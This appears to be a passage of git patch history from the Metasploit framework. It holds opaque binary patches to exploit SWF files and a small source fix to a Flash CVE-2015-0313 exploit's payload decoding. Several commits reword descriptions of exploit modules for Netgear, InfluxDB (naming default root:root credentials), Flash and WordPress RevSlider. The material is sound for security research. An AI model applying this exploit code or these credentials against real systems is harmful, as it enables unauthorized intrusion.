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
MXm~;m|LxC!DuiU3g8%>k

diff --git a/external/source/exploits/CVE-2015-0313/Main.as b/external/source/exploits/CVE-2015-0313/Main.as
index 58ed3d2bb5..b25008234d 100755
--- a/external/source/exploits/CVE-2015-0313/Main.as
+++ b/external/source/exploits/CVE-2015-0313/Main.as
@@ -39,7 +39,10 @@ public class Main extends Sprite
 
     private function mainThread():void
     {
-        b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
+        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+        var pattern:RegExp = / /g;
+        b64_payload = b64_payload.replace(pattern, "+")
+        b64.decode(b64_payload)
         payload = b64.toByteArray().toString()
 
         ba.length = 0x1000
@@ -204,4 +207,4 @@ public class Main extends Sprite
         return addr + i
     }
 }
-}
\ No newline at end of file
+}

From 95b5ff6beab8913caa0204e9712875dff9c0b82d Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 26 May 2015 17:00:10 -0500
Subject: [PATCH 0203/1013] Minor fixups on recent modules.

Edited modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
first landed in #5301, @m-1-k-3's aux module to extract passwords from
Netgear soap interfaces

Edited modules/auxiliary/scanner/http/influxdb_enum.rb first landed in

Edited modules/auxiliary/scanner/http/title.rb first landed in #5333,
HTML Title Grabber

Edited modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
first landed in #5401, multi-platform CVE-2015-0311 - Flash uncompress()
UAF

Edited modules/exploits/unix/webapp/wp_revslider_upload_execute.rb first
landed in #5290, Wordpress RevSlider Module
---
 .../auxiliary/admin/http/netgear_soap_password_extractor.rb | 2 +-
 modules/auxiliary/scanner/http/influxdb_enum.rb             | 4 ++--
 modules/auxiliary/scanner/http/title.rb                     | 4 ++--
 .../multi/browser/adobe_flash_uncompress_zlib_uaf.rb        | 2 +-
 modules/exploits/unix/webapp/wp_revslider_upload_execute.rb | 6 +++---
 5 files changed, 9 insertions(+), 9 deletions(-)

diff --git a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
index 445457777a..f97ae71ee2 100644
--- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
+++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
       'Description' => %q{
         This module exploits an authentication bypass vulnerability in different Netgear devices.
         It allows to extract the password for the remote management interface. This module has been
-        tested on a Netgear WNDR3700v4 - V1.0.1.42, but others devices are reported as vulnerable:
+        tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:
         NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,
         NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),
         NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),
diff --git a/modules/auxiliary/scanner/http/influxdb_enum.rb b/modules/auxiliary/scanner/http/influxdb_enum.rb
index c42f044c57..4e13b6ad46 100644
--- a/modules/auxiliary/scanner/http/influxdb_enum.rb
+++ b/modules/auxiliary/scanner/http/influxdb_enum.rb
@@ -14,8 +14,8 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'InfluxDB Enum Utility',
       'Description'    => %q{
-        This module enumerates databases on InfluxDB using the REST API
-        (using default authentication - root:root).
+        This module enumerates databases on InfluxDB using the REST API using the
+        default authentication of root:root.
       },
       'References'     =>
         [
diff --git a/modules/auxiliary/scanner/http/title.rb b/modules/auxiliary/scanner/http/title.rb
index eda97d9e11..4b573346ae 100644
--- a/modules/auxiliary/scanner/http/title.rb
+++ b/modules/auxiliary/scanner/http/title.rb
@@ -15,8 +15,8 @@ class Metasploit3 < Msf::Auxiliary
     super(
       'Name'        => 'HTTP HTML Title Tag Content Grabber',
       'Description' => %q{
-        Generates a GET request to the webservers provided and returns the server header,
-        HTML title attribute and location header (if set). Useful for rapidly identifying
+        Generates a GET request to the provided webservers and returns the server header,
+        HTML title attribute and location header (if set). This is useful for rapidly identifying
         interesting web applications en mass.
       },
       'Author'       => 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>',
diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
index 774ab5ab27..c862ba03d2 100644
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'                => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
       'Description'         => %q{
-        This module exploits an use after free vulnerability in Adobe Flash Player. The
+        This module exploits a use after free vulnerability in Adobe Flash Player. The
         vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
         to uncompress() a malformed byte stream. This module has been tested successfully
         on:
diff --git a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
index de36db95df..e5a4994653 100644
--- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
+++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
@@ -16,9 +16,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'WordPress RevSlider File Upload and Execute Vulnerability',
       'Description'    => %q{
-        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
-        Slider Revolution (RevSlider) plugin, versions 3.0.95 and prior. The
-        vulnerability allows for arbitrary file upload and remote code execution.
+        This module exploits an arbitrary PHP code upload vulnerability in the
+        WordPress ThemePunch Slider Revolution (RevSlider) plugin, versions 3.0.95
+        and prior. The vulnerability allows for arbitrary file upload and remote code execution.
       },
       'Author'         =>
         [

From 19c7445d9d94ad64eec6d68200988c9761273e1e Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 17:20:49 -0500
Subject: [PATCH 0204/1013] Fix CVE-2015-0336

---
 data/exploits/CVE-2015-0336/msf.swf           | Bin 18060 -> 18121 bytes
 external/source/exploits/CVE-2015-0336/Msf.as |   7 +++++--
 2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/data/exploits/CVE-2015-0336/msf.swf b/data/exploits/CVE-2015-0336/msf.swf
index 4a080464a1976c24c6aadb2ed1fad6110bf9983e..97b6ffe99c8b2f00fb4196a19f6bd600601dfc99 100755
GIT binary patch
delta 17980
zcmV(tK<vMajRDDx0SQ`HQyieP006kL2_*r46*TRLN;6mope853vUdXY94Dv+$PjU^
zBCJjnUMdDo!<%VZoXxDVMI=lMBjHUC-}wyN5TCiJCs9$Ly>adVT>zxW80beaX~zWa
z?(t{Et8qDl;T8CBK<d_%5K;tNY~<k`W1}6>XWPlJBBa&v3a&_xba|J90}%hCS07`4
z(=&<$7Hricz|>mw4fIo|m2h5EUFZ%lyfV8XiK<jCEy5o9EX;%IsV0B{wQnJ#O+Nj>
z2f1qZAP~^Ts@Mh(@4w;{gYkAnW&yZNRuTW!Qc2__#N*Y@8Br7z7{1sOOv4QwObGh&
z)0|%>pW4o2(_-%Zjfa3ht|2Dhom(Y;wQf77I%5u^mS&Exag!h5`aZOnnpd^zk5j_o
ztMlrs<<li<yCM@LT`r#bF?#1u4zCWI*R);BynRLWvCKSP@?x<20c;5uIovVMQu5PN
z&)9PtknJ~!=!`b*^Gj3@Q_b1zoofiBxDdzJW-Jfmp4BJvl*^b2b$#YcY#~d3C<sTB
z9tx?&mH^{~atF>QBCCRQkK?DbCccZ3TI^}8t|}qlrJ$r5m=$bVh(I=W(_jYn39iWH
z0rMu!gn|s*Yl9+Oxn7dN3*1C~lcjAszP{1x#aPqAeo}j-)x)a?3lsduCJ?}3p6E|a
z%!gW_Q$U4;8ei4CgpJdF3nLeQV7&ZCs>nY22>}yb5lBSH50y>f>L4tS5Y<YIB!z~G
